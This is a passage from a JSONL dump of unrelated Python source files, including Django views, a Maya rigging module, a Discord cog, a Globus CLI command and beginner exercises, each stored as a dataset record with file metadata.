self\n\t\n#\n\n","sub_path":"Install/build/lib/ShareYourSystem/Object/Installer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"20901682","text":"\"\"\"Las personas adscritas a la jubilación por\nantiguedad adulta deben tener 60 años o más\ny una antiguedad en su empleo de 25 años o más.\nDeterminar en qué tipo de jubilación, quedará\nadscrita una persona.\"\"\"\n\nedad= int(input(\"Ingrese su edad: \"))\nempleo= int(input(\"¿Cuántos años de antiguedad tiene su empresa? \"))\n\nif edad>=60 and empleo< 25:\n\tprint(\"Usted quedará inscrito en la jubilación por edad\")\nelif edad <60 and empleo>=25:\n\tprint(\"Usted quedará inscrito a la jubilación por antiguedad joven\")\nelif edad>=60 and empleo>=25:\n\tprint(\"Usted quedaráinscrito a la jubilación por antiguedad adulta\")\nelse:\n\tprint(\"Usted aún no se jubila\")","sub_path":"Semana 2/Sesion 4/Mío.py","file_name":"Mío.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"72614993","text":"from django.urls import path, include\nfrom .auth import views\n\nurlpatterns = [\n path('account/', include('account.auth.urls')),\n path('settings/', include('account.settings.urls')),\n path('u/', include('account.users.urls')),\n # django-social-authのエラーハンドリング\n path('complete//', views.social_auth_complete)\n]\n","sub_path":"web/account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"532137737","text":"import requests\nimport sqlite3 as lite\nimport datetime \napi_key = \"<31de5d7b68d2b90e5f611ff0018e4f10>\"\nurl = 'https://api.forecast.io/forecast/' + api_key\ncities = {\"Atlanta\": '33.762909,-84.422675',\n \"Austin\": '30.303936,-97.754355',\n \"Boston\": '42.331960,-71.020173',\n \"Chicago\": '41.837551,-87.681844',\n \"Cleveland\": '41.478462,-81.679435'\n }\nend_date = datetime.datetime.now()\ncon = lite.connect('weather.db')\ncur = con.cursor()\ncities.keys()\n#with con: \n#\tcur.execute('CREATE TABLE daily_temp ( day_of_reading INT, city1 REAL, city2 REAL, city3 REAL, city4 REAL, city5 REAL);')\nquery_date = end_date - datetime.timedelta(days=30)\nwhile con:\n\twhile query_date < end_date:\n\t\tcur.execute(\"INSERT INTO daily_temp(day_of_reading) VALUES (?)\", (str(query_date.strftime('%Y-%m-%dT%H:%M:%S')),))\n\t\tquery_date += datetime.timedelta(days=1)\nfor k,v in cities.iteritems():\n\tquery_date = end_date - datetime.timedelta(days=30)\n\twhile query_date < end_date:\n\t\tr = requests.get(url + v + ',' + query_date.strftime('%Y-%m-%dT12:00:00'))\n\t\twith con:\n\t\t\tcur.execute('UPDATE daily_temp SET ' + k + ' = ' + str(r.json()['daily']['data'][0]['temperatureMax']) + ' WHERE day_of_reading = ' + query_date.strftime('%Y-%m-%dT%H:%M:%S'))\n\t\tquery_date += datetime.timedelta(days=1)\n\tcon.close()\n","sub_path":"Storing_Temp_Data_v2.py","file_name":"Storing_Temp_Data_v2.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"282340404","text":"from django.http.response import HttpResponseRedirect\nfrom django.views.generic.base import TemplateView\nfrom teacher.models import Subject, Teacher\nfrom django.shortcuts import render\nfrom django.views.generic import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.urls import reverse_lazy\nimport csv\n\n\nclass Index(LoginRequiredMixin, ListView):\n template_name = \"home/index.html\"\n context_object_name = \"subjects\"\n queryset = Subject.objects.all()\n paginate_by = 20\n\n\nclass BulkUpload(UserPassesTestMixin, TemplateView):\n template_name = \"home/bulk_upload.html\"\n\n def post(self, request, *args, **kwargs):\n subject_models = []\n data_to_save = []\n _subject_filter = set()\n\n # process uploaded file\n csv_file = request.FILES.get(\"file\")\n csv_file = csv_file.read().decode('utf-8').splitlines()\n\n rows = csv.DictReader(csv_file)\n\n for row in rows:\n first_name = row.get(\"First Name\")\n last_name = row.get(\"Last Name\")\n email = row.get(\"Email Address\")\n\n # check if we have required fields before processing. saves unnecessary processing\n if (first_name and last_name and email):\n profile_pic = row.get(\"Profile picture\")\n phone_no = row.get(\"Phone Number\")\n room_no = row.get(\"Room Number\")\n subjects = [s.strip() for s in row.get(\"Subjects taught\", '').lower().split(\",\")]\n\n for subject in subjects:\n if subject == \"maths\":\n subject = \"mathematics\"\n\n if subject and not subject in _subject_filter: \n subject_models.append(Subject(name=subject))\n _subject_filter.add(subject)\n\n data_to_save.append(\n {\n \"first_name\": first_name, \n \"last_name\": last_name, \n \"profile_pic\": profile_pic, \n \"email\": email, \n \"phone_no\": phone_no,\n \"room_no\": room_no,\n \"subjects_taught\": subjects[:5] # max item to save is 5\n })\n\n Subject.objects.bulk_create(subject_models, ignore_conflicts=True)\n all_subjects = Subject.objects.all()\n\n for data in data_to_save:\n subjects_taught = all_subjects.filter(name__in=data[\"subjects_taught\"])\n\n t, _ = Teacher.objects.get_or_create(\n email=data[\"email\"],\n defaults={\n \"first_name\": data[\"first_name\"],\n \"last_name\": data[\"last_name\"],\n \"phone_no\": data[\"phone_no\"],\n \"room_no\": data[\"room_no\"],\n \"profile_pic\": data[\"profile_pic\"],\n }\n )\n t.subjects_taught.set(subjects_taught)\n\n\n return HttpResponseRedirect(reverse_lazy('teacher:index'))\n\n\n def dispatch(self, request, *args, **kwargs):\n user_test_result = self.request.user.is_superuser\n\n if not user_test_result:\n return HttpResponseRedirect(reverse_lazy('home:index'))\n return super().dispatch(request, *args, **kwargs)\n\n def test_func(self):\n return self.request.user.is_superuser","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"250378992","text":"from __future__ import absolute_import\n\nimport re\n\nimport maya.cmds as cmds\n\nfrom rigging.library.utils import controller as rlu_controller, transform as rlu_transform\nfrom rigging.tools import pythonVersion as rt_pythonVersion, utils as rt_utils\n\n\nclass Build:\n def __init__(self,\n lid01_up, lid01_low,\n lid05_up, lid05_low,\n lid_up_joint_bind01_grp_offset,\n lid_low_joint_bind01_grp_offset,\n lid_up_joint_bind05_grp_offset,\n lid_low_joint_bind05_grp_offset,\n scale,\n side_RGT,\n side_LFT,\n lid_up_ctrl_bind01_grp_zro,\n lid_low_ctrl_bind01_grp_zro,\n lid_up_ctrl_bind05_grp_zro,\n lid_low_ctrl_bind05_grp_zro,\n prefix_name_in,\n prefix_name_out,\n side,\n ctrl_shape,\n ctrl_color,\n suffix_controller,\n lid_out=False):\n\n # ==================================================================================================================\n # CORNER CONTROLLER\n # ==================================================================================================================\n # controller in corner\n lid_corner_in_ctrl = self.lid_corner_ctrl(match_pos_one=lid01_up,\n match_pos_two=lid01_low,\n prefix=prefix_name_in,\n scale=scale,\n side=side,\n ctrl_shape=ctrl_shape,\n ctrl_color=ctrl_color,\n add_attr=lid_out,\n suffix_controller=suffix_controller)\n\n # controller in corner\n lid_corner_out_ctrl = self.lid_corner_ctrl(match_pos_one=lid05_up,\n match_pos_two=lid05_low,\n prefix=prefix_name_out,\n scale=scale,\n side=side,\n ctrl_shape=ctrl_shape,\n ctrl_color=ctrl_color,\n add_attr=lid_out,\n suffix_controller=suffix_controller)\n\n self.lid_in_grp = lid_corner_in_ctrl[1]\n self.lid_out_grp = lid_corner_out_ctrl[1]\n self.lid_in_ctrl = lid_corner_in_ctrl[0]\n self.lid_out_ctrl = lid_corner_out_ctrl[0]\n\n position_lid_corner_out = cmds.xform(lid_corner_out_ctrl[0], ws=1, q=1, t=1)[0]\n if position_lid_corner_out > 0:\n # parent constraint corner grp bind jnt\n rt_utils.connect_attr_translate_rotate(lid_corner_in_ctrl[0], lid_up_joint_bind01_grp_offset)\n rt_utils.connect_attr_translate_rotate(lid_corner_in_ctrl[0], lid_low_joint_bind01_grp_offset)\n rt_utils.connect_attr_translate_rotate(lid_corner_out_ctrl[0], lid_up_joint_bind05_grp_offset)\n rt_utils.connect_attr_translate_rotate(lid_corner_out_ctrl[0], lid_low_joint_bind05_grp_offset)\n else:\n self.corner_reverse_node(side_RGT, side_LFT, lidCornerCtrl=lid_corner_out_ctrl[0], side=side,\n lidCornerName=prefix_name_out,\n targetUp=lid_up_joint_bind05_grp_offset, targetLow=lid_low_joint_bind05_grp_offset)\n\n self.corner_reverse_node(side_RGT, side_LFT, lidCornerCtrl=lid_corner_in_ctrl[0], side=side,\n lidCornerName=prefix_name_in,\n targetUp=lid_up_joint_bind01_grp_offset, targetLow=lid_low_joint_bind01_grp_offset)\n\n # SHOW AND HIDE CONTROLLER CORNER\n if lid_out:\n # ADD ATTRIBUTE FOR LID OUT CONTROLLER\n cmds.connectAttr(lid_corner_in_ctrl[0] + '.%s' % lid_corner_in_ctrl[3],\n lid_up_ctrl_bind01_grp_zro + '.visibility')\n cmds.connectAttr(lid_corner_in_ctrl[0] + '.%s' % lid_corner_in_ctrl[3],\n lid_low_ctrl_bind01_grp_zro + '.visibility')\n cmds.connectAttr(lid_corner_out_ctrl[0] + '.%s' % lid_corner_out_ctrl[3],\n lid_up_ctrl_bind05_grp_zro + '.visibility')\n cmds.connectAttr(lid_corner_out_ctrl[0] + '.%s' % lid_corner_out_ctrl[3],\n lid_low_ctrl_bind05_grp_zro + '.visibility')\n\n # OFFSET GRP CONTROLLER\n self.lid_corner_in_ctrl_grp_offset = lid_corner_in_ctrl[2]\n self.lid_corner_out_ctrl_grp_offset = lid_corner_out_ctrl[2]\n # ==================================================================================================================\n # PARENT TO GROUP\n # ==================================================================================================================\n cmds.parent(lid_up_ctrl_bind01_grp_zro, lid_corner_in_ctrl[0])\n cmds.parent(lid_low_ctrl_bind01_grp_zro, lid_corner_in_ctrl[0])\n cmds.parent(lid_up_ctrl_bind05_grp_zro, lid_corner_out_ctrl[0])\n cmds.parent(lid_low_ctrl_bind05_grp_zro, lid_corner_out_ctrl[0])\n\n def reorder_number(self, prefix, side_RGT, side_LFT):\n # get the number\n new_prefix = rlu_transform.reposition_side(object=prefix, side_RGT=side_RGT, side_LFT=side_LFT)\n try:\n patterns = [r'\\d+']\n prefix_number = rt_utils.prefix_name(new_prefix)\n for p in patterns:\n prefix_number = re.findall(p, prefix_number)[0]\n except:\n prefix_number = ''\n\n # get the prefix without number\n prefix_no_number = rt_pythonVersion.translation_string(new_prefix)\n\n return prefix_no_number, prefix_number\n\n def corner_reverse_node(self, sideRGT, sideLFT, lidCornerCtrl, side, lidCornerName='', targetUp='', targetLow=''):\n newName, numberNew = self.reorder_number(prefix=lidCornerName, side_RGT=sideRGT, side_LFT=sideLFT)\n\n transRev = cmds.createNode('multiplyDivide', n=newName + 'Trans' + numberNew + side + '_mdn')\n rotRev = cmds.createNode('multiplyDivide', n=newName + 'Rot' + numberNew + side + '_mdn')\n cmds.connectAttr(lidCornerCtrl + '.translate', transRev + '.input1')\n cmds.setAttr(transRev + '.input2X', -1)\n\n cmds.connectAttr(lidCornerCtrl + '.rotate', rotRev + '.input1')\n cmds.setAttr(rotRev + '.input2Y', -1)\n cmds.setAttr(rotRev + '.input2Z', -1)\n\n cmds.connectAttr(transRev + '.output', targetUp + '.translate')\n cmds.connectAttr(rotRev + '.output', targetUp + '.rotate')\n cmds.connectAttr(transRev + '.output', targetLow + '.translate')\n cmds.connectAttr(rotRev + '.output', targetLow + '.rotate')\n\n def lid_corner_ctrl(self, match_pos_one, match_pos_two, prefix, scale, side, ctrl_shape, ctrl_color,\n suffix_controller,\n add_attr=False):\n corner_ctrl = rlu_controller.Control(match_obj_first_position=match_pos_one,\n match_obj_second_position=match_pos_two,\n prefix=prefix,\n shape=ctrl_shape, groups_ctrl=['Zro', 'Offset'],\n ctrl_size=scale * 0.07, suffix=suffix_controller,\n ctrl_color=ctrl_color, lock_channels=['v', 's'], side=side)\n\n # check position\n position_corner_ctrl = cmds.xform(corner_ctrl.control, ws=1, q=1, t=1)[0]\n\n # flipping the controller\n if position_corner_ctrl < 0:\n cmds.setAttr(corner_ctrl.parent_control[0] + '.scaleX', -1)\n\n self.control = corner_ctrl.control\n self.lid_corner_ctrl_grp = corner_ctrl.parent_control[0]\n self.lid_corner_ctrl_grp_offset = corner_ctrl.parent_control[1]\n\n # ADD ATTRIBUTE\n if add_attr:\n self.show_detail_ctrl = rt_utils.add_attribute(objects=[corner_ctrl.control], long_name=['showDetailCtrl'],\n attributeType=\"long\", min=0, max=1, dv=0, keyable=True)\n\n return corner_ctrl.control, corner_ctrl.parent_control[0], corner_ctrl.parent_control[\n 1], self.show_detail_ctrl\n\n else:\n return corner_ctrl.control, corner_ctrl.parent_control[0], corner_ctrl.parent_control[1]\n","sub_path":"rigging/library/base/face/lidCorner.py","file_name":"lidCorner.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"408608129","text":"# Create a Queue using List with no size limit.\n# Author : DC\n\nclass Queue:\n\n def __init__(self):\n self.queue = []\n\n def __str__(self):\n values = ([str(x) for x in self.queue])\n return ' '.join(values)\n\n def isEmpty(self):\n return self.queue == []\n\n def enqueue(self,value):\n self.queue.append(value)\n\n def dequeue(self):\n if self.isEmpty():\n print(\"The queue is empty.\")\n else:\n return self.queue.pop(0)\n\n def peek(self):\n if self.isEmpty():\n print(\"The queue is empty.\")\n else:\n return self.queue[0]\nif __name__ == '__main__':\n q = Queue()\n print(q.isEmpty())\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n print(q)\n print(\"Popped Item : \"+str(q.dequeue()))\n print(q)\n print(\"Peeked Item : \" + str(q.peek()))\n print(q)","sub_path":"queue/queueWOSizeLimit.py","file_name":"queueWOSizeLimit.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"11976995","text":"import ast\n\nfrom discord import Embed, TextChannel\nfrom discord.ext import commands\n\n\nclass EmbedCreator(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def embed(self, ctx, dict_str: str, channel: TextChannel = None):\n embed_dict = ast.literal_eval(dict_str)\n embed = Embed.from_dict(embed_dict)\n\n if channel is None:\n await ctx.send(embed=embed)\n return\n\n await channel.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(EmbedCreator(bot))\n","sub_path":"extensions/embed_creator.py","file_name":"embed_creator.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"647172483","text":"import click\n\nfrom globus_cli.parsing import common_options, endpoint_id_arg\nfrom globus_cli.safeio import FORMAT_TEXT_RECORD, FORMAT_TEXT_TABLE, formatted_print\nfrom globus_cli.services.transfer import get_endpoint_w_server_list\n\n\n@click.command(\"list\", help=\"List all servers belonging to an endpoint\")\n@common_options\n@endpoint_id_arg\ndef server_list(endpoint_id):\n \"\"\"\n Executor for `globus endpoint server list`\n \"\"\"\n # raises usage error on shares for us\n endpoint, server_list = get_endpoint_w_server_list(endpoint_id)\n\n if server_list == \"S3\": # not GCS -- this is an S3 endpoint\n server_list = {\"s3_url\": endpoint[\"s3_url\"]}\n fields = [(\"S3 URL\", \"s3_url\")]\n text_format = FORMAT_TEXT_RECORD\n else: # regular GCS host endpoint\n fields = (\n (\"ID\", \"id\"),\n (\"URI\", lambda s: (s[\"uri\"] or \"none (Globus Connect Personal)\")),\n )\n text_format = FORMAT_TEXT_TABLE\n formatted_print(server_list, text_format=text_format, fields=fields)\n","sub_path":"globus_cli/commands/endpoint/server/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535945074","text":"__author__ = 'jullyt'\n#!/bin/python3\n\"\"\"Observe that its base and height are both equal to ,\nand the image is drawn using # symbols and spaces.\nThe last line is not preceded by any spaces.\nWrite a program that prints a staircase of size n .\"\"\"\n\"\"\"i = 1\n while i <= n:\n new = i * '#'\n i += 1\n print(('{:>'+str(n)+'}').format(new))\"\"\"\nimport sys\n\ndef staircase(n):\n\n for i in range (1,n+1):\n print(('{:>'+str(n)+'}').format(i * '#'))\n\n # Complete this function\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n staircase(n)\n\n","sub_path":"staircase.py","file_name":"staircase.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"527041040","text":"from setuptools import setup\n\n__author__ = 'TRAN QUANG HUY'\n__copyright__ = 'Copyright (C) 2019, Intek Institute'\n__email__ = 'huy.tran@f4.intek.edu.vn'\n__license__ = 'MIT'\n__maintainer__ = 'TRAN QUANG HUY'\n__version__ = '1.0.6'\n__name__ = \"spritessheettquang97\"\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n author=__author__,\n author_email=__email__,\n name= __name__,\n copyright = __copyright__,\n license = __license__,\n maintainer = __maintainer__,\n version = __version__,\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=[\"spritessheettquang97\"],\n include_package_data=True,\n install_requires=[\n \"numpy==1.18.1\",\n \"Pillow==7.0.0 \",\n ]\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442589172","text":"import random as rd\nfrom builtins import len\n\nimport pandas as pd\n#quantidade de linhas geradas no .csv\nqt_loops = 2000\n\nAuditores = ['Ellie', 'Joel', 'Freeman', 'Breen','Kratos', 'Atreus']\n\nLinha = ['almox', 'produção', 'cofre', 'manuseio', 'perso', 'expedição', 'adm']\n\nItem = ['item1', 'item2', 'item3', 'item4', 'item5', 'item6', 'item7', 'item8', 'item9', 'item10']\n\nCategoria = ['Manuseio 01', 'Manuseio 02', 'Manuseio 03', 'Manuseio 04'\n'Linha 01', 'Linha 02', 'Linha 03', 'Linha 04', 'Produção', 'Expedição'\n'Roterização', 'BH 01', 'BH 02', 'BH 03', 'MX 26', 'Cofre'\n'DC 01', 'DC 02', 'NA']\n\nID = ['idA', 'idB', 'idC']\n\nCategoria = ['Não gerou arquivo de retorno', 'Conferência de material'\n, 'Perda de cartões', 'Manuseio errado'\n, 'Conferência de material'\n, 'Falta de identificação'\n,'Material misturado'\n,'Duplicidade de cartões'\n,'Ordem de produção sem insumo'\n,'Produto misturado']\n\nimport random as rd\n\nData = []\n\nfor i in range(2000):\n d = rd.randint(1, 31)\n #m = rd.randint(1, 12)\n m = '05'\n\n if (d < 10):\n d = str(d).zfill(2)\n else:\n d = str(d)\n\n #if (m < 10):\n # m = str(m).zfill(2)\n #else:\n # m = str(m)\n\n D = '2020-' + m + '-' + d\n Data.append(D)\n\nHora = []\n\nfor i in range(2000):\n hora = rd.randint(0, 23)\n minuto = rd.randint(0, 59)\n segundos = rd.randint(0, 59)\n\n if (hora < 10):\n hora = str(hora).zfill(2)\n else:\n hora = str(hora)\n\n if (minuto < 10):\n minuto = str(minuto).zfill(2)\n else:\n minuto = str(minuto)\n\n if(segundos < 10):\n segundos = str(segundos).zfill(2)\n else:\n segundos = str(segundos)\n\n H = hora + ':' + minuto + ':' + segundos\n Hora.append(H)\n\nTurno = ['Diurno A', 'Diurno B', 'Noturno A', 'Noturno B']\n\nstatus = ['OK', 'NOK']\n\ndict_audit = []\nfor i in range(qt_loops):\n dict_audit.append(Auditores[rd.randint(0, len(Auditores) - 1)])\n\ndict_linha = []\nfor i2 in range(qt_loops):\n dict_linha.append(Linha[rd.randint(0, len(Linha) - 1)])\n\ndia = ['SEG', 'TER', 'QUA', 'QUI', 'SEX', 'SAB', 'DOM']\ndia_sem = []\nfor i2 in range(qt_loops):\n dia_sem.append(dia[rd.randint(0, len(dia) - 1)])\n\ndict_categ = []\nfor i3 in range(qt_loops):\n dict_categ.append(Categoria[rd.randint(0, len(Categoria) - 1)])\n\ndict_ID = []\nfor i4 in range(qt_loops):\n dict_ID.append(ID[rd.randint(0, len(ID) - 1)])\n\ndict_Data = []\nfor i5 in range(qt_loops):\n dict_Data.append(Data[rd.randint(0, len(Data) - 1)])\n\ndict_Hora = []\nfor i6 in range(qt_loops):\n dict_Hora.append(Hora[rd.randint(0, len(Hora) - 1)])\n\ndict_Turno = []\nfor i8 in range(qt_loops):\n dict_Turno.append(Turno[rd.randint(0, len(Turno) - 1)])\n\ntituto = ['abc', 'def', 'ghi', 'jlm']\ndict_titulo = []\nfor i9 in range(qt_loops):\n dict_titulo.append(tituto[rd.randint(0, len(tituto) - 1)])\n\nProduto = ['MultiCard', 'Class', 'Unique', 'Elite', 'Alfa']\ndict_Produto = []\nfor i10 in range(qt_loops):\n dict_Produto.append(Produto[rd.randint(0, len(Produto) - 1)])\n\ndict_Qtde = []\nfor i11 in range(qt_loops):\n dict_Qtde.append(rd.randint(0, 500))\n\ndict_status = []\nfor i12 in range(qt_loops):\n dict_status.append(status[rd.randint(0, len(status) - 1)])\n\ndict_Item = []\nfor i13 in range(qt_loops):\n dict_Item.append(Item[rd.randint(0, len(Item) - 1)])\n\n\ndict = {'item': dict_Item, 'linha': dict_linha, 'categoria': dict_categ, 'id': dict_ID, 'auditor': dict_audit,\n 'data': dict_Data, 'dia_sem': dia_sem, 'hora_i': dict_Hora, 'hora_f': dict_Hora, 'turno': dict_Turno, 'produto': dict_Produto,\n 'qtde_lote': dict_Qtde, 'qtde': dict_Qtde, 'titulo': dict_titulo, 'descri': dict_titulo, 'status': dict_status}\n\ndt = pd.DataFrame(dict)\n#no caminho, insira o destino de onde será salvo o arquivo.\ncaminho = 'c:/dados.csv'\ndt.to_csv(caminho, index=False)\n","sub_path":"RandDataFrame.py","file_name":"RandDataFrame.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"360607228","text":"import sys, string, math\r\n\r\n# A naive Python implementation of LIS problem\r\n\r\n# global variable to store the maximum\r\nglobal maximum\r\n\r\ndef lis2(arr, n):\r\n # to allow the access of global variable\r\n global maximum\r\n\r\n if n == 1: return 1\r\n\r\n maxEndingHere = 1\r\n\r\n for i in range(1, n):\r\n res = lis2(arr, i)\r\n if arr[i - 1] < arr[n - 1] and res + 1 > maxEndingHere:\r\n maxEndingHere = res + 1\r\n maximum = max(maximum, maxEndingHere)\r\n return maxEndingHere\r\n\r\ndef lis(arr):\r\n # to allow the access of global variable\r\n global maximum\r\n n = len(arr)\r\n maximum = 1\r\n lis2(arr, n)\r\n return maximum\r\n\r\n\r\n# Driver program to test the above function\r\nn = int(input())\r\nL = [ int(x) for x in input().split()]\r\nprint(lis(L))\r\n","sub_path":"Level-4/s03/guvi-L4-s03-py06.py","file_name":"guvi-L4-s03-py06.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"93400049","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n# class presa():\n# def __init__(self,tsc)\n\ndef add_vertex(G,presas,depredadores):\n G.add_nodes_from([presas[i] for i in range(len(presas))])\n G.add_nodes_from([depredadores[i] for i in range(len(depredadores))])\ndef add_edges(G,aristas):\n G.add_edges_from([i for i in aristas])\nG=nx.Graph()\nadd_vertex(G,[x for x in range(7)],[y for y in range(7,16)])\nadd_edges(G,[(7,6),(8,9),(6,5),(5,9),(8,7),(2,7),(1,6),(0,5),(4,9),(3,8),(13,2),(13,3),(14,3),(15,4),(10,0),(11,1),(12,2)])\n#G.add_edge(1,2)\nl=G.number_of_nodes()\ns=G.number_of_edges()\nprint(l)\nprint(list(G.nodes))\nprint(s)\nprint(G.edges)\noptions = {\n 'nodes_color': [\"red\",\"lightblue\"],\n 'nodes_size': 150,\n 'width': 1,\n}\n\n\nplt.subplot(111)\n\n#nx.draw_spectral(G, **options,with_labels=False, font_weight='bold')\nnx.draw_shell(G,nlist=[range(5,10),range(5), range(10,16)],with_labels=True, font_weight='bold')\n#nx.draw_circular(G, **options,with_labels=False, font_weight='bold')\n#nx.draw_random(G, **options,with_labels=False, font_weight='bold')\nplt.savefig(\"grafoEjemplo.PNG\")\nplt.show()\n","sub_path":"tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"377211658","text":"# -*- coding: utf-8 -*-\nimport random\n\n# Fonction utiliser pour automatiser la fonction, elle prend une liste d'utilisateur en plus du dico des serveurs\n# \ndef serveur_plusieur_utilisateur(dicto_serveur,liste_utilisateur):\n # ont creer un dico dont les clef sont les serveur\n dico_utilisateur={}\n for serveur in dicto_serveur:\n dico_utilisateur[serveur]=list()\n\n # Pour tout les uilisateurs ont demande un serveur, et ont ajoute ceux-ci au dictionnaire de serveur en tant que valeur\n for utilisateur in liste_utilisateur:\n serv=choix_serveur(dicto_serveur)\n dicto_serveur[serv]=dicto_serveur[serv]+1\n dico_utilisateur[serv].append(utilisateur)\n return dico_utilisateur\n\n# Fonction utiliser pour recuperer que un serveur dans le cas de l'ajout d'une seule vm\ndef serveur_un_utilisateur(dicto_serveur):\n return choix_serveur(dicto_serveur)\n\n# Fonction qui donne le serveur à attribué, donne le serveur le moins peuplé sinon si il en a plusieur fait un rand\ndef choix_serveur(dicto_serveur):\n values=list(dicto_serveur.values())\n keys = list(dicto_serveur.keys())\n mini=min(values)\n # si il a plusieurs serveur avec le minimum de vm dessus\n if values.count(mini)>1:\n # Ont prend un nombre random entre 0 et le nombre de machine au min -1\n r=random.randint(0, values.count(mini)-1)\n l=[]\n # On fait la liste de ses machines\n for v in range(0,len(values)):\n if values[v]==mini:\n l.append(keys[v])\n v+=1\n # On retourne la machine prise dans la liste par rapport au nombre aleatoire\n return l[r]\n # Si il n'y a qu'un seul serveur à avoir moins de vm que les autre ont le retourne\n else:\n i=values.index(mini)\n return keys[i]\n \n\n\n# listetudiant = [\"adrian\",\"maxime\",\"listetrim1\",\"oui\",\"x\",\"y\"]\n# dictserver = {\"serveur1\":6,\"serveur2\":5,\"serveur3\":6}\n# print(serveur_plusieur_utilisateur(dictserver,listetudiant))\n# print(choix_serveur(dictserver))\n","sub_path":"code/scripts/repartition.py","file_name":"repartition.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"419215857","text":"from django.shortcuts import render, HttpResponse, HttpResponseRedirect, redirect\nfrom . import modelControler as mc\nimport json\n\n# Create your views here.\n\n\n# トップページ\ndef index(request):\n login = False\n player_name = \" \"\n error = False\n room_list = {}\n try:\n if \"player_name\" in request.session:\n player_name = mc.getPlayer(request.session[\"player_name\"])[\"name\"]\n login = True\n room_list = mc.getAllRoom()\n if \"player_name\" in request.POST:\n try:\n mc.createPlayer(request.POST[\"player_name\"])\n login = True\n request.session[\"player_name\"] = request.POST[\"player_name\"]\n player_name = request.POST[\"player_name\"]\n room_list = mc.getAllRoom()\n except:\n error = True\n if \"logout\" in request.POST:\n login = False\n mc.destroyPlayer(request.session[\"player_name\"])\n player_name = \" \"\n del request.session[\"player_name\"]\n except:\n if \"player_name\" in request.session:\n del request.session[\"player_name\"]\n login = False\n player_name = \" \"\n error = False\n\n return render(request, \"app/index.html\", {\"login\": login, \"player_name\": player_name, \"error\": error, \"room_list\": room_list})\n\n\n# ルーム画面\ndef room(request):\n try:\n player_name = mc.getPlayer(request.session[\"player_name\"])[\"name\"]\n room_name = mc.getRoom(request.session[\"room_name\"])[\"name\"]\n room_num = mc.getRoom(room_name)[\"num\"]\n room_state = mc.getRoom(room_name)[\"game\"]\n if room_num < 5 and not room_state:\n mc.setRoomNum(room_name)\n return render(request, \"app/room.html\", {\"player_name\": player_name, \"room_name\": room_name})\n else:\n return HttpResponseRedirect(\"/\")\n except:\n return HttpResponseRedirect(\"/\")\n\n\n# ajax用\ndef ajax(request):\n func = request.POST[\"func\"]\n if func == \"create_room\":\n try:\n mc.createRoom(request.POST[\"room_name\"])\n request.session[\"room_name\"] = request.POST[\"room_name\"]\n room_id = mc.getRoom(request.POST[\"room_name\"])[\"id\"]\n mc.setRoomId(request.session[\"player_name\"], room_id)\n return HttpResponse(\"true\")\n except:\n return HttpResponse(\"false\")\n elif func == \"enter_room\":\n try:\n room_num = mc.getRoom(request.POST[\"room_name\"])[\"num\"]\n if room_num >= 5:\n return HttpResponse(\"false\")\n else:\n request.session[\"room_name\"] = request.POST[\"room_name\"]\n room_id = mc.getRoom(request.POST[\"room_name\"])[\"id\"]\n mc.setRoomId(request.session[\"player_name\"], room_id)\n return HttpResponse(\"true\")\n except:\n return HttpResponseRedirect(\"/\")\n elif func == \"get_room_id\":\n room_id = mc.getRoom(request.session[\"room_name\"])[\"id\"]\n return HttpResponse(room_id)\n elif func == \"get_player_list\":\n room_id = request.POST[\"room_id\"]\n players = list(mc.getAllPlayer().filter(room_id=room_id))\n return HttpResponse(json.dumps(players, ensure_ascii=False))\n elif func == \"exit_room\":\n mc.setRoomId(request.session[\"player_name\"], None)\n if \"room_name\" in request.session:\n mc.setRoomNum(request.session[\"room_name\"])\n del request.session[\"room_name\"]\n return 